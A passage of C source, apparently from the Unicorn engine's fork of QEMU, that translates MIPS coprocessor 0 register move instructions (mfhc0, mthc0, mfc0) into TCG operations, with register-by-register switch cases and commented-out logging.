gen_mfhc0(DisasContext *ctx, TCGv arg, int reg, int sel) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; //const char *register_name = "invalid"; switch (reg) { case CP0_REGISTER_02: switch (sel) { case 0: CP0_CHECK(ctx->hflags & MIPS_HFLAG_ELPA); gen_mfhc0_entrylo(tcg_ctx, arg, offsetof(CPUMIPSState, CP0_EntryLo0)); //register_name = "EntryLo0"; break; default: goto cp0_unimplemented; } break; case CP0_REGISTER_03: switch (sel) { case CP0_REG03__ENTRYLO1: CP0_CHECK(ctx->hflags & MIPS_HFLAG_ELPA); gen_mfhc0_entrylo(tcg_ctx, arg, offsetof(CPUMIPSState, CP0_EntryLo1)); //register_name = "EntryLo1"; break; default: goto cp0_unimplemented; } break; case CP0_REGISTER_09: switch (sel) { case CP0_REG09__SAAR: CP0_CHECK(ctx->saar); gen_helper_mfhc0_saar(tcg_ctx, arg, tcg_ctx->cpu_env); //register_name = "SAAR"; break; default: goto cp0_unimplemented; } break; case CP0_REGISTER_17: switch (sel) { case CP0_REG17__LLADDR: gen_mfhc0_load64(tcg_ctx, arg, offsetof(CPUMIPSState, CP0_LLAddr), ctx->CP0_LLAddr_shift); //register_name = "LLAddr"; break; case CP0_REG17__MAAR: CP0_CHECK(ctx->mrp); gen_helper_mfhc0_maar(tcg_ctx, arg, tcg_ctx->cpu_env); //register_name = "MAAR"; break; default: goto cp0_unimplemented; } break; case CP0_REGISTER_19: switch (sel) { case CP0_REG19__WATCHHI0: case CP0_REG19__WATCHHI1: case CP0_REG19__WATCHHI2: case CP0_REG19__WATCHHI3: case CP0_REG19__WATCHHI4: case CP0_REG19__WATCHHI5: case CP0_REG19__WATCHHI6: case CP0_REG19__WATCHHI7: /* upper 32 bits are only available when Config5MI != 0 */ CP0_CHECK(ctx->mi); gen_mfhc0_load64(tcg_ctx, arg, offsetof(CPUMIPSState, CP0_WatchHi[sel]), 0); //register_name = "WatchHi"; break; default: goto cp0_unimplemented; } break; case CP0_REGISTER_28: switch (sel) { case 0: case 2: case 4: case 6: gen_mfhc0_load64(tcg_ctx, arg, offsetof(CPUMIPSState, CP0_TagLo), 0); //register_name = "TagLo"; break; default: goto cp0_unimplemented; } break; default: goto cp0_unimplemented; } return; cp0_unimplemented: // qemu_log_mask(LOG_UNIMP, "mfhc0 %s (reg %d sel %d)\n", // register_name, reg, sel); tcg_gen_movi_tl(tcg_ctx, arg, 0); } static void gen_mthc0(DisasContext *ctx, TCGv arg, int reg, int sel) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; //const char *register_name = "invalid"; uint64_t mask = ctx->PAMask >> 36; switch (reg) { case CP0_REGISTER_02: switch (sel) { case 0: CP0_CHECK(ctx->hflags & MIPS_HFLAG_ELPA); tcg_gen_andi_tl(tcg_ctx, arg, arg, mask); gen_mthc0_entrylo(tcg_ctx, arg, offsetof(CPUMIPSState, CP0_EntryLo0)); //register_name = "EntryLo0"; break; default: goto cp0_unimplemented; } break; case CP0_REGISTER_03: switch (sel) { case CP0_REG03__ENTRYLO1: CP0_CHECK(ctx->hflags & MIPS_HFLAG_ELPA); tcg_gen_andi_tl(tcg_ctx, arg, arg, mask); gen_mthc0_entrylo(tcg_ctx, arg, offsetof(CPUMIPSState, CP0_EntryLo1)); //register_name = "EntryLo1"; break; default: goto cp0_unimplemented; } break; case CP0_REGISTER_09: switch (sel) { case CP0_REG09__SAAR: CP0_CHECK(ctx->saar); gen_helper_mthc0_saar(tcg_ctx, tcg_ctx->cpu_env, arg); //register_name = "SAAR"; break; default: goto cp0_unimplemented; } break; case CP0_REGISTER_17: switch (sel) { case CP0_REG17__LLADDR: /* * LLAddr is read-only (the only exception is bit 0 if LLB is * supported); the CP0_LLAddr_rw_bitmask does not seem to be * relevant for modern MIPS cores supporting MTHC0, therefore * treating MTHC0 to LLAddr as NOP. */ //register_name = "LLAddr"; break; case CP0_REG17__MAAR: CP0_CHECK(ctx->mrp); gen_helper_mthc0_maar(tcg_ctx, tcg_ctx->cpu_env, arg); //register_name = "MAAR"; break; default: goto cp0_unimplemented; } break; case CP0_REGISTER_19: switch (sel) { case CP0_REG19__WATCHHI0: case CP0_REG19__WATCHHI1: case CP0_REG19__WATCHHI2: case CP0_REG19__WATCHHI3: case CP0_REG19__WATCHHI4: case CP0_REG19__WATCHHI5: case CP0_REG19__WATCHHI6: case CP0_REG19__WATCHHI7: /* upper 32 bits are only available when Config5MI != 0 */ CP0_CHECK(ctx->mi); gen_helper_0e1i(mthc0_watchhi, arg, sel); //register_name = "WatchHi"; break; default: goto cp0_unimplemented; } break; case CP0_REGISTER_28: switch (sel) { case 0: case 2: case 4: case 6: tcg_gen_andi_tl(tcg_ctx, arg, arg, mask); gen_mthc0_store64(tcg_ctx, arg, offsetof(CPUMIPSState, CP0_TagLo)); //register_name = "TagLo"; break; default: goto cp0_unimplemented; } break; default: goto cp0_unimplemented; } cp0_unimplemented: //qemu_log_mask(LOG_UNIMP, "mthc0 %s (reg %d sel %d)\n", // register_name, reg, sel); return; } static inline void gen_mfc0_unimplemented(DisasContext *ctx, TCGv arg) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; if (ctx->insn_flags & ISA_MIPS32R6) { tcg_gen_movi_tl(tcg_ctx, arg, 0); } else { tcg_gen_movi_tl(tcg_ctx, arg, ~0); } } static void gen_mfc0(DisasContext *ctx, TCGv arg, int reg, int sel) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; //const char *register_name = "invalid"; if (sel != 0) { check_insn(ctx, ISA_MIPS32); } switch (reg) { case CP0_REGISTER_00: switch (sel) { case CP0_REG00__INDEX: gen_mfc0_load32(tcg_ctx, arg, offsetof(CPUMIPSState, CP0_Index)); //register_name = "Index"; break; case CP0_REG00__MVPCONTROL: CP0_CHECK(ctx->insn_flags & ASE_MT); gen_helper_mfc0_mvpcontrol(tcg_ctx, arg, tcg_ctx->cpu_env); //register_name = "MVPControl"; break; case CP0_REG00__MVPCONF0: CP0_CHECK(ctx->insn_flags & ASE_MT); gen_helper_mfc0_mvpconf0(tcg_ctx, arg, tcg_ctx->cpu_env); //register_name = "MVPConf0"; break; case CP0_REG00__MVPCONF1: CP0_CHECK(ctx->insn_flags & ASE_MT); gen_helper_mfc0_mvpconf1(tcg_ctx, arg, tcg_ctx->cpu_env); //register_name = "MVPConf1"; break; case CP0_REG00__VPCONTROL: CP0_CHECK(ctx->vp); gen_mfc0_load32(tcg_ctx, arg, offsetof(CPUMIPSState, CP0_VPControl)); //register_name = "VPControl"; break; default: goto cp0_unimplemented; } break; case CP0_REGISTER_01: switch (sel) { case CP0_REG01__RANDOM: CP0_CHECK(!(ctx->insn_flags & ISA_MIPS32R6)); gen_helper_mfc0_random(tcg_ctx, arg, tcg_ctx->cpu_env); //register_name = "Random"; break; case CP0_REG01__VPECONTROL: CP0_CHECK(ctx->insn_flags & ASE_MT); gen_mfc0_load32(tcg_ctx, arg, offsetof(CPUMIPSState, CP0_VPEControl)); //register_name = "VPEControl"; break; case CP0_REG01__VPECONF0: CP0_CHECK(ctx->insn_flags & ASE_MT); gen_mfc0_load32(tcg_ctx, arg, offsetof(CPUMIPSState, CP0_VPEConf0)); //register_name = "VPEConf0"; break; case CP0_REG01__VPECONF1: CP0_CHECK(ctx->insn_flags & ASE_MT); gen_mfc0_load32(tcg_ctx, arg, offsetof(CPUMIPSState, CP0_VPEConf1)); //register_name = "VPEConf1"; break; case CP0_REG01__YQMASK: CP0_CHECK(ctx->insn_flags & ASE_MT); gen_mfc0_load64(tcg_ctx, arg, offsetof(CPUMIPSState, CP0_YQMask)); //register_name = "YQMask"; break; case CP0_REG01__VPESCHEDULE: CP0_CHECK(ctx->insn_flags & ASE_MT); gen_mfc0_load64(tcg_ctx, arg, offsetof(CPUMIPSState, CP0_VPESchedule)); //register_name = "VPESchedule"; break; case CP0_REG01__VPESCHEFBACK: CP0_CHECK(ctx->insn_flags & ASE_MT); gen_mfc0_load64(tcg_ctx, arg, offsetof(CPUMIPSState, CP0_VPEScheFBack)); //register_name = "VPEScheFBack"; break; case CP0_REG01__VPEOPT: CP0_CHECK(ctx->insn_flags & ASE_MT); gen_mfc0_load32(tcg_ctx, arg, offsetof(CPUMIPSState, CP0_VPEOpt)); //register_name = "VPEOpt"; break; default: goto cp0_unimplemented; } break; case CP0_REGISTER_02: switch (sel) { case CP0_REG02__ENTRYLO0: { TCGv_i64 tmp = tcg_temp_new_i64(tcg_ctx); tcg_gen_ld_i64(tcg_ctx, tmp, tcg_ctx->cpu_env, offsetof(CPUMIPSState, CP0_EntryLo0)); #if defined(TARGET_MIPS64) if (ctx->rxi) { /* Move RI/XI fields to bits 31:30 */ tcg_gen_shri_tl(tcg_ctx, arg, tmp, CP0EnLo_XI); tcg_gen_deposit_tl(tcg_ctx, tmp, tmp, arg, 30, 2); } #endif gen_move_low32(tcg_ctx, arg, tmp); tcg_temp_free_i64(tcg_ctx, tmp); } //register_name = "EntryLo0"; break; case CP0_REG02__TCSTATUS: CP0_CHECK(ctx->insn_flags & ASE_MT); gen_helper_mfc0_tcstatus(tcg_ctx, arg, tcg_ctx->cpu_env); //register_name = "TCStatus"; break; case CP0_REG02__TCBIND: CP0_CHECK(ctx->insn_flags & ASE_MT); gen_helper_mfc0_tcbind(tcg_ctx, arg, tcg_ctx->cpu_env); //register_name = "TCBind"; break; case CP0_REG02__TCRESTART: CP0_CHECK(ctx->insn_flags & ASE_MT); gen_helper_mfc0_tcrestart(tcg_ctx, arg, tcg_ctx->cpu_env); //register_name = "TCRestart"; break; case CP0_REG02__TCHALT: CP0_CHECK(ctx->insn_flags & ASE_MT); gen_helper_mfc0_tchalt(tcg_ctx, arg, tcg_ctx->cpu_env); //register_name = "TCHalt"; break; case CP0_REG02__TCCONTEXT: CP0_CHECK(ctx->insn_flags & ASE_MT); gen_helper_mfc0_tccontext(tcg_ctx, arg, tcg_ctx->cpu_env); //register_name = "TCContext"; break; case CP0_REG02__TCSCHEDULE: CP0_CHECK(ctx->insn_flags & ASE_MT); gen_helper_mfc0_tcschedule(tcg_ctx, arg, tcg_ctx->cpu_env); //register_name = "TCSchedule"; break; case CP0_REG02__TCSCHEFBACK: CP0_CHECK(ctx->insn_flags & ASE_MT); gen_helper_mfc0_tcschefback(tcg_ctx, arg, tcg_ctx->cpu_env); //register_name = "TCScheFBack"; break; default: goto cp0_unimplemented; } break; case CP0_REGISTER_03: switch (sel) { case CP0_REG03__ENTRYLO1: { TCGv_i64 tmp = tcg_temp_new_i64(tcg_ctx); tcg_gen_ld_i64(tcg_ctx, tmp, tcg_ctx->cpu_env, offsetof(CPUMIPSState, CP0_EntryLo1)); #if defined(TARGET_MIPS64) if (ctx->rxi) { /* Move RI/XI fields to bits 31:30 */ tcg_gen_shri_tl(tcg_ctx, arg, tmp, CP0EnLo_XI); tcg_gen_deposit_tl(tcg_ctx, tmp, tmp, arg, 30, 2); } #endif gen_move_low32(tcg_ctx, arg, tmp); tcg_temp_free_i64(tcg_ctx, tmp); } //register_name = "EntryLo1"; break; case CP0_REG03__GLOBALNUM: CP0_CHECK(ctx->vp); gen_mfc0_load32(tcg_ctx, arg, offsetof(CPUMIPSState, CP0_GlobalNumber)); //register_name = "GlobalNumber"; break; default: goto cp0_unimplemented; } break; case CP0_REGISTER_04: switch (sel) { case CP0_REG04__CONTEXT: tcg_gen_ld_tl(tcg_ctx, arg, tcg_ctx->cpu_env, offsetof(CPUMIPSState, CP0_Context)); tcg_gen_ext32s_tl(tcg_ctx, arg, arg); //register_name = "Context"; break; case CP0_REG04__CONTEXTCONFIG: /* SmartMIPS ASE */ /* gen_helper_mfc0_contextconfig(tcg_ctx, arg); */ //register_name = "ContextConfig"; goto cp0_unimplemented; case CP0_REG04__USERLOCAL: CP0_CHECK(ctx->ulri); tcg_gen_ld_tl(tcg_ctx, arg, tcg_ctx->cpu_env, offsetof(CPUMIPSState, active_tc.CP0_UserLocal)); tcg_gen_ext32s_tl(tcg_ctx, arg, arg); //register_name = "UserLocal"; break; case CP0_REG04__MMID: CP0_CHECK(ctx->mi); gen_helper_mtc0_memorymapid(tcg_ctx, tcg_ctx->cpu_env, arg); //register_name = "MMID"; break; default: goto cp0_unimplemented; } break; case CP0_REGISTER_05: switch (sel) { case CP0_REG05__PAGEMASK: gen_mfc0_load32(tcg_ctx, arg, offsetof(CPUMIPSState, CP0_PageMask)); //register_name = "PageMask"; break; case CP0_REG05__PAGEGRAIN: check_insn(ctx, ISA_MIPS32R2); gen_mfc0_load32(tcg_ctx, arg, offsetof(CPUMIPSState, CP0_PageGrain)); //register_name = "PageGrain"; break; case CP0_REG05__SEGCTL0: CP0_CHECK(ctx->sc); tcg_gen_ld_tl(tcg_ctx, arg, tcg_ctx->cpu_env, offsetof(CPUMIPSState, CP0_SegCtl0)); tcg_gen_ext32s_tl(tcg_ctx, arg, arg); //register_name = "SegCtl0"; break; case CP0_REG05__SEGCTL1: CP0_CHECK(ctx->sc); tcg_gen_ld_tl(tcg_ctx, arg, tcg_ctx->cpu_env, offsetof(CPUMIPSState, CP0_SegCtl1)); tcg_gen_ext32s_tl(tcg_ctx, arg, arg); //register_name = "SegCtl1"; break; case CP0_REG05__SEGCTL2: CP0_CHECK(ctx->sc); tcg_gen_ld_tl(tcg_ctx, arg, tcg_ctx->cpu_env, offsetof(CPUMIPSState, CP0_SegCtl2)); tcg_gen_ext32s_tl(tcg_ctx, arg, arg); //register_name = "SegCtl2"; break; case CP0_REG05__PWBASE: check_pw(ctx); gen_mfc0_load32(tcg_ctx, arg, offsetof(CPUMIPSState, CP0_PWBase)); //register_name = "PWBase"; break; case CP0_REG05__PWFIELD: check_pw(ctx); gen_mfc0_load32(tcg_ctx, arg, offsetof(CPUMIPSState, CP0_PWField)); //register_name = "PWField"; break; case CP0_REG05__PWSIZE: check_pw(ctx); gen_mfc0_load32(tcg_ctx, arg, offsetof(CPUMIPSState, CP0_PWSize)); //register_name = "PWSize"; break; default: goto cp0_unimplemented; } break; case CP0_REGISTER_06: switch (sel) { case CP0_REG06__WIRED: gen_mfc0_load32(tcg_ctx, arg, offsetof(CPUMIPSState, CP0_Wired)); //register_name = "Wired"; break; case CP0_REG06__SRSCONF0: check_insn(ctx, ISA_MIPS32R2); gen_mfc0_load32(tcg_ctx, arg, offsetof(CPUMIPSState, CP0_SRSConf0)); //register_name = "SRSConf0"; break; case CP0_REG06__SRSCONF1: check_insn(ctx, ISA_MIPS32R2); gen_mfc0_load32(tcg_ctx, arg, offsetof(CPUMIPSState, CP0_SRSConf1)); //register_name = "SRSConf1"; break; case CP0_REG06__SRSCONF2: check_insn(ctx, ISA_MIPS32R2); gen_mfc0_load32(tcg_ctx, arg, offsetof(CPUMIPSState, CP0_SRSConf2)); //register_name = "SRSConf2"; break; case CP0_REG06__SRSCONF3: check_insn(ctx, ISA_MIPS32R2); gen_mfc0_load32(tcg_ctx, arg, offsetof(CPUMIPSState, CP0_SRSConf3)); //register_name = "SRSConf3"; break; case CP0_REG06__SRSCONF4: check_insn(ctx, ISA_MIPS32R2); gen_mfc0_load32(tcg_ctx, arg, offsetof(CPUMIPSState, CP0_SRSConf4)); //register_name = "SRSConf4"; break; case CP0_REG06__PWCTL: check_pw(ctx); gen_mfc0_load32(tcg_ctx, arg, offsetof(CPUMIPSState, CP0_PWCtl)); //register_name = "PWCtl"; break; default: goto cp0_unimplemented; } break; case CP0_REGISTER_07: switch (sel) { case CP0_REG07__HWRENA: check_insn(ctx, ISA_MIPS32R2); gen_mfc0_load32(tcg_ctx, arg, offsetof(CPUMIPSState, CP0_HWREna)); //register_name = "HWREna"; break; default: goto cp0_unimplemented; } break; case CP0_REGISTER_08: switch (sel) { case CP0_REG08__BADVADDR: tcg_gen_ld_tl(tcg_ctx, arg, tcg_ctx->cpu_env, offsetof(CPUMIPSState, CP0_BadVAddr)); tcg_gen_ext32s_tl(tcg_ctx, arg, arg); //register_name = "BadVAddr"; break; case CP0_REG08__BADINSTR: CP0_CHECK(ctx->bi); gen_mfc0_load32(tcg_ctx, arg, offsetof(CPUMIPSState, CP0_BadInstr)); //register_name = "BadInstr"; break; case CP0_REG08__BADINSTRP: CP0_CHECK(ctx->bp); gen_mfc0_load32(tcg_ctx, arg, offsetof(CPUMIPSState, CP0_BadInstrP)); //register_name = "BadInstrP"; break; case CP0_REG08__BADINSTRX: CP0_CHECK(ctx->bi); gen_mfc0_load32(tcg_ctx, arg, offsetof(CPUMIPSState, CP0_BadInstrX)); tcg_gen_andi_tl(tcg_ctx, arg, arg, ~0xffff); //register_name = "BadInstrX"; break; default: goto cp0_unimplemented; } break; case CP0_REGISTER_09: switch (sel) { case CP0_REG09__COUNT: /* Mark as an IO operation because we read the time. */ if (tb_cflags(ctx->base.tb) & CF_USE_ICOUNT) { gen_io_start(tcg_ctx); } gen_helper_mfc0_count(tcg_ctx, arg, tcg_ctx->cpu_env); /* * Break the TB to be able to take timer interrupts immediately * after reading count. DISAS_STOP isn't sufficient, we need to * ensure we break completely out of translated code. */ gen_save_pc(tcg_ctx, ctx->base.pc_next + 4); ctx->base.is_jmp = DISAS_EXIT; //register_name = "Count"; break; case CP0_REG09__SAARI: CP0_CHECK(ctx->saar); gen_mfc0_load32(tcg_ctx, arg, offsetof(CPUMIPSState, CP0_SAARI)); //register_name = "SAARI"; break; case CP0_REG09__SAAR: CP0_CHECK(ctx->saar); gen_helper_mfc0_saar(tcg_ctx, arg, tcg_ctx->cpu_env); //register_name = "SAAR"; break; default: goto cp0_unimplemented; } break; case CP0_REGISTER_10: switch (sel) { case CP0_REG10__ENTRYHI: tcg_gen_ld_tl(tcg_ctx, arg, tcg_ctx->cpu_env, offsetof(CPUMIPSState, CP0_EntryHi)); tcg_gen_ext32s_tl(tcg_ctx, arg, arg); //register_name = "EntryHi"; break; default: goto cp0_unimplemented; } break; case CP0_REGISTER_11: switch (sel) { case CP0_REG11__COMPARE: gen_mfc0_load32(tcg_ctx, arg, offsetof(CPUMIPSState, CP0_Compare)); //register_name = "Compare"; break; /* 6,7 are implementation dependent */ default: goto cp0_unimplemented; } break; case CP0_REGISTER_12: switch (sel) { case CP0_REG12__STATUS: gen_mfc0_load32(tcg_ctx, arg, offsetof(CPUMIPSState, CP0_Status)); //register_name = "Status"; break; case CP0_REG12__INTCTL: check_insn(ctx, ISA_MIPS32R2); gen_mfc0_load32(tcg_ctx, arg, offsetof(CPUMIPSState, CP0_IntCtl)); //register_name = "IntCtl"; break; case CP0_REG12__SRSCTL: check_insn(ctx, ISA_MIPS32R2); gen_mfc0_load32(tcg_ctx, arg, offsetof(CPUMIPSState, CP0_SRSCtl)); //register_name = "SRSCtl"; break; case CP0_REG12__SRSMAP: check_insn(ctx, ISA_MIPS32R2); gen_mfc0_load32(tcg_ctx, arg, offsetof(CPUMIPSState, CP0_SRSMap)); //register_name = "SRSMap"; break; default: goto cp0_unimplemented; } break; case CP0_REGISTER_13: switch (sel) { case CP0_REG13__CAUSE: gen_mfc0_load32(tcg_ctx, arg, offsetof(CPUMIPSState, CP0_Cause)); //register_name = "Cause"; break; default: goto cp0_unimplemented; } break; case CP0_REGISTER_14: switch (sel) { case CP0_REG14__EPC: tcg_gen_ld_tl(tcg_ctx, arg, tcg_ctx->cpu_env, offsetof(CPUMIPSState, CP0_EPC)); tcg_gen_ext32s_tl(tcg_ctx, arg, arg); //register_name = "EPC"; break; default: goto cp0_unimplemented; } break; case CP0_REGISTER_15: switch (sel) { case CP0_REG15__PRID: gen_mfc0_load32(tcg_ctx, arg, offsetof(CPUMIPSState, CP0_PRid)); //register_name = "PRid"; break; case CP0_REG15__EBASE: check_insn(ctx, ISA_MIPS32R2); tcg_gen_ld_tl(tcg_ctx, arg, tcg_ctx->cpu_env, offsetof(CPUMIPSState, CP0_EBase)); tcg_gen_ext32s_tl(tcg_ctx, arg, arg); //register_name = "EBase"; break; case CP0_REG15__CMGCRBASE: check_insn(ctx, ISA_MIPS32R2); CP0_CHECK(ctx->cmgcr); tcg_gen_ld_tl(tcg_ctx, arg, tcg_ctx->cpu_env, offsetof(CPUMIPSState, CP0_CMGCRBase)); tcg_gen_ext32s_tl(tcg_ctx, arg, arg); //register_name = "CMGCRBase"; break; default: goto cp0_unimplemented; } break; case CP0_REGISTER_16: switch (sel) { case CP0_REG16__CONFIG: gen_mfc0_load32(tcg_ctx, arg, offsetof(CPUMIPSState, CP0_Config0)); //register_name = "Config"; break; case CP0_REG16__CONFIG1: gen_mfc0_load32(tcg_ctx, arg, offsetof(CPUMIPSState, CP0_Config1)); //register_name = "Config1"; break; case CP0_REG16__CONFIG2: gen_mfc0_load32(tcg_ctx, arg, offsetof(CPUMIPSState, CP0_Config2)); //register_name = "Config2"; break; case CP0_REG16__CONFIG3: gen_mfc0_load32(tcg_ctx, arg, offsetof(CPUMIPSState, CP0_Config3)); //register_name = "Config3"; break; case CP0_REG16__CONFIG4: gen_mfc0_load32(tcg_ctx, arg, offsetof(CPUMIPSState, CP0_Config4)); //register_name = "Config4"; break; case CP0_REG16__CONFIG5: gen_mfc0_load32(tcg_ctx, arg, offsetof(CPUMIPSState, CP0_Config5)); //register_name = "Config5"; break; /* 6,7 are implementation dependent */ case CP0_REG16__CONFIG6: gen_mfc0_load32(tcg_ctx, arg, offsetof(CPUMIPSState, CP0_Config6)); //register_name = "Config6"; break; case CP0_REG16__CONFIG7: gen_mfc0_load32(tcg_ctx, arg, offsetof(CPUMIPSState, CP0_Config7)); //register_name = "Config7"; break; default: goto cp0_unimplemented; } break; case CP0_REGISTER_17: switch (sel) { case CP0_REG17__LLADDR: gen_helper_mfc0_lladdr(tcg_ctx, arg, tcg_ctx->cpu_env); //register_name = "LLAddr"; break; case CP0_REG17__MAAR: CP0_CHECK(ctx->mrp); gen_helper_mfc0_maar(tcg_ctx, arg, tcg_ctx->cpu_env); //register_name = "MAAR"; break; case CP0_REG17__MAARI: CP0_CHECK(ctx->mrp); gen_mfc0_load32(tcg_ctx, arg, offsetof(CPUMIPSState, CP0_MAARI)); //register_name = "MAARI"; break; default: goto cp0_unimplemented; } break; case CP0_REGISTER_18: switch (sel) { case CP0_REG18__WATCHLO0: case CP0_REG18__WATCHLO1: case CP0_REG18__WATCHLO2: case CP0_REG18__WATCHLO3: case CP0_REG18__WATCHLO4: case CP0_REG18__WATCHLO5: case CP0_REG18__WATCHLO6: case CP0_REG18__WATCHLO7: CP0_CHECK(ctx->CP0_Config1 & (1 << CP0C1_WR)); gen_helper_1e0i(mfc0_watchlo, arg, sel); //register_name = "WatchLo"; break; default: goto cp0_unimplemented; } break; case CP0_REGISTER_19: switch (sel) { case CP0_REG19__WATCHHI0: case CP0_REG19__WATCHHI1: case CP0_REG19__WATCHHI2: case CP0_REG19__WATCHHI3: case CP0_REG19__WATCHHI4: case CP0_REG19__WATCHHI5: case CP0_REG19__WATCHHI6: case CP0_REG19__WATCHHI7: CP0_CHECK(ctx->CP0_Config1 & (1 << CP0C1_WR)); gen_helper_1e0i(mfc0_watchhi, arg, sel); //register_name = "WatchHi"; break; default: goto cp0_unimplemented; } break; case CP0_REGISTER_20: switch (sel) { case CP0_REG20__XCONTEXT: #if defined(TARGET_MIPS64) check_insn(ctx, ISA_MIPS3); tcg_gen_ld_tl(tcg_ctx, arg, tcg_ctx->cpu_env, offsetof(CPUMIPSState, CP0_XContext)); tcg_gen_ext32s_tl(tcg_ctx, arg, arg); //register_name = "XContext"; break; #endif default: goto cp0_unimplemented; } break; case CP0_REGISTER_21: /* Officially reserved, but sel 0 is used for R1x000 framemask */ CP0_CHECK(!(ctx->insn_flags & ISA_MIPS32R6)); switch (sel) { case 0: gen_mfc0_load32(tcg_ctx, arg, offsetof(CPUMIPSState, CP0_Framemask)); //register_name = "Framemask"; break; default: goto cp0_unimplemented; } break; case CP0_REGISTER_22: tcg_gen_movi_tl(tcg_ctx, arg, 0); /* unimplemented */ //register_name = "'Diagnostic"; /* implementation dependent */ break; case CP0_REGISTER_23: switch (sel) { case CP0_REG23__DEBUG: gen_helper_mfc0_debug(tcg_ctx, arg, tcg_ctx->cpu_env); /* EJTAG support */ //register_name = "Debug"; break; case CP0_REG23__TRACECONTROL: /* PDtrace support */ /* gen_helper_mfc0_tracecontrol(tcg_ctx, arg); */ //register_name = "TraceControl"; goto cp0_unimplemented; case CP0_REG23__TRACECONTROL2: /* PDtrace support */ /* gen_helper_mfc0_tracecontrol2(tcg_ctx, arg); */ //register_name = "TraceControl2"; goto cp0_unimplemented; case CP0_REG23__USERTRACEDATA1: /* PDtrace support */ /* gen_helper_mfc0_usertracedata1(tcg_ctx, arg);*/ //register_name = "UserTraceData1"; goto cp0_unimplemented; case CP0_REG23__TRACEIBPC: /* PDtrace support */ /* gen_helper_mfc0_traceibpc(tcg_ctx, arg); */ //register_name = "TraceIBPC"; goto cp0_unimplemented; case CP0_REG23__TRACEDBPC: /* PDtrace support */ /* gen_helper_mfc0_tracedbpc(tcg_ctx, arg); */ //register_name = "TraceDBPC"; goto cp0_unimplemented; default: goto cp0_unimplemented; } break; case CP0_REGISTER_24: switch (sel) { case CP0_REG24__DEPC: /* EJTAG support */ tcg_gen_ld_tl(tcg_ctx, arg, tcg_ctx->cpu_env, offsetof(CPUMIPSState, CP0_DEPC)); tcg_gen_ext32s_tl(tcg_ctx, arg, arg); //register_name = "DEPC"; break; default: goto cp0_unimplemented; } break; case CP0_REGISTER_25: switch (sel) { case CP0_REG25__PERFCTL0: gen_mfc0_load32(tcg_ctx, arg, offsetof(CPUMIPSState, CP0_Performance0)); //register_name = "Performance0"; break; case CP0_REG25__PERFCNT0: /* gen_helper_mfc0_performance1(tcg_ctx, arg); */ //register_name = "Performance1"; goto cp0_unimplemented; case CP0_REG25__PERFCTL1: /* gen_helper_mfc0_performance2(tcg_ctx, arg); */ //register_name = "Performance2"; goto cp0_unimplemented; case CP0_REG25__PERFCNT1: /* gen_helper_mfc0_performance3(tcg_ctx, arg); */ //register_name = "Performance3"; goto cp0_unimplemented; case CP0_REG25__PERFCTL2: /* gen_helper_mfc0_performance4(tcg_ctx, arg); */ //register_name = "Performance4"; goto cp0_unimplemented; case CP0_REG25__PERFCNT2: /* gen_helper_mfc0_performance5(tcg_ctx, arg); */ //register_name = "Performance5"; goto cp0_unimplemented; case CP0_REG25__PERFCTL3: /* gen_helper_mfc0_performance6(tcg_ctx, arg); */ //register_name = "Performance6"; goto cp0_unimplemented; case CP0_REG25__PERFCNT3: /* gen_helper_mfc0_performance7(tcg_ctx, arg); */ //register_name = "Performance7"; goto cp0_unimplemented; default: goto cp0_unimplemented; } break; case CP0_REGISTER_26: switch (sel) { case CP0_REG26__ERRCTL: gen_mfc0_load32(tcg_ctx, arg, offsetof(CPUMIPSState, CP0_ErrCtl)); //register_name = "ErrCtl"; break; default: goto cp0_unimplemented; } break; case CP0_REGISTER_27: switch (sel) { case CP0_REG27__CACHERR: tcg_gen_movi_tl(tcg_ctx, arg, 0); /* unimplemented */ //register_name = "CacheErr"; break; default: goto cp0_unimplemented; } break; case CP0_REGISTER_28: switch (sel) { case CP0_REG28__TAGLO: case CP0_REG28__TAGLO1: case CP0_REG28__TAGLO2: case CP0_REG28__TAGLO3: { TCGv_i64 tmp = tcg_temp_new_i64(tcg_ctx); tcg_gen_ld_i64(tcg_ctx, tmp, tcg_ctx->cpu_env, offsetof(CPUMIPSState, CP0_TagLo)); gen_move_low32(tcg_ctx, arg, tmp); tcg_temp_free_i64(tcg_ctx, tmp); } //register_name = "TagLo"; break; case CP0_REG28__DATALO: case CP0_REG28__DATALO1: case CP0_REG28__DATALO2: case CP0_REG28__DATALO3: gen_mfc0_load32(tcg_ctx, arg, offsetof(CPUMIPSState, CP0_DataLo)); //register_name = "DataLo"; break; default: goto cp0_unimplemented; } break; case CP0_REGISTER_29: switch (sel) { case CP0_REG29__TAGHI: case CP0_REG29__TAGHI1: case CP0_REG29__TAGHI2: case CP0_REG29__TAGHI3: gen_mfc0_load32(tcg_ctx, arg, offsetof(CPUMIPSState, CP0_TagHi)); //register_name = "TagHi"; break; case CP0_REG29__DATAHI: case CP0_REG29__DATAHI1: case CP0_REG29__DATAHI2: case CP0_REG29__DATAHI3: gen_mfc0_load32(tcg_ctx, arg, offsetof(CPUMIPSState, CP0_DataHi)); //register_name = "DataHi"; break; default: goto cp0_unimplemented; } break; case CP0_REGISTER_30: switch (sel) { case CP0_REG30__ERROREPC: tcg_gen_ld_tl(tcg_ctx, arg, tcg_ctx->cpu_env, offsetof(CPUMIPSState, CP0_ErrorEPC)); tcg_gen_ext32s_tl(tcg_ctx, arg, arg); //register_name = "ErrorEPC"; break; default: goto cp0_unimplemented; } break; case CP0_REGISTER_31: switch (sel) { case CP0_REG31__DESAVE: /* EJTAG support */ gen_mfc0_load32(tcg_ctx, arg, offsetof(CPUMIPSState, CP0_DESAVE)); //register_name = "DESAVE"; break; case CP0_REG31__KSCRATCH1: case CP0_REG31__KSCRATCH2: case CP0_REG31__KSCRATCH3: case CP0_REG31__KSCRATCH4: case CP0_REG31__KSCRATCH5: case CP0_REG31__KSCRATCH6: CP0_CHECK(ctx->kscrexist & (1 << sel)); tcg_gen_ld_tl(tcg_ctx, arg, tcg_ctx->cpu_env, offsetof(CPUMIPSState, CP0_KScratch[sel - 2])); tcg_gen_ext32s_tl(tcg_ctx, arg, arg); //register_name = "KScratch"; break; default: goto cp0_unimplemented; } break; default: goto cp0_unimplemented; } return; cp0_unimplemented: //qemu_log_mask(LOG_UNIMP, "mfc0 %s (reg %d sel %d)\n", //register_name, reg, sel); gen_mfc0_unimplemented(ctx, arg); } static void gen_mtc0(DisasContext *ctx, TCGv arg, int reg, int sel) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; //const char *register_name = "invalid"; if (sel != 